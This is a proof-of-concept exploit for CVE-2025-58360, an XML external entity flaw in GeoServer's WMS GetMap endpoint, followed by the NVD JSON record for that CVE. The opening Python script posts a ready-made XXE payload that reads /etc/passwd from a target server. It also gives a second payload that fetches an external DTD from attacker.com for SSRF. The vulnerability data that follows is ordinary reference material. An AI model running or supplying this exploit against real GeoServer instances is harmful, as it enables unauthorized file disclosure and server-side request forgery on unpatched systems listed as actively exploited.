CVE-2025-58360

# XXE PoC for CVE-2025-58360 - GeoServer GetMap XXE Injection # Target: vulnerable GeoServer /geoserver/wms endpoint import requests target = "http://target-server:8080/geoserver/wms" # XXE payload to read local file xxe_payload = '''<?xml version="1.0"?> <!DOCTYPE wms [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <wms> <GetMap> <layers>topp:states</layers> <sld>&xxe;</sld> <format>image/png</format> </GetMap> </wms>''' # Alternative: XXE for SSRF xxe_ssrf_payload = '''<?xml version="1.0"?> <!DOCTYPE wms [ <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd"> ]> <wms> <GetMap> <layers>topp:states</layers> <sld>&xxe;</sld> </GetMap> </wms>''' # Send malicious request headers = { 'Content-Type': 'application/xml', 'User-Agent': 'Mozilla/5.0' } response = requests.post(target, data=xxe_payload, headers=headers, timeout=10) print(f"Status: {response.status_code}") print(f"Response: {response.text[:500]}")

{"cve": {"id": "CVE-2025-58360", "sourceIdentifier": "[email protected]", "published": "2025-11-25T21:15:56.363", "lastModified": "2025-12-12T13:54:01.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GeoServer is an open source server that allows users to share and edit geospatial data. From version 2.26.0 to before 2.26.2 and before 2.25.6, an XML External Entity (XXE) vulnerability was identified. The application accepts XML input through a specific endpoint /geoserver/wms operation GetMap. However, this input is not sufficiently sanitized or restricted, allowing an attacker to define external entities within the XML request. This issue has been patched in GeoServer 2.25.6, GeoServer 2.26.3, and GeoServer 2.27.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2025-12-11", "cisaActionDue": "2026-01-01", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "OSGeo GeoServer Improper Restriction of XML External Entity Reference Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.25.6", "matchCriteriaId": "929A415A-3926-49DE-855E-9363B5E495D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.26.0", "versionEndExcluding": "2.26.2", "matchCriteriaId": "58DCFD5D-914E-442F-AD07-C019C3BDDB2A"}]}]}], "references": [{"url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://osgeo-org.atlassian.net/browse/GEOS-11682", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-58360", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}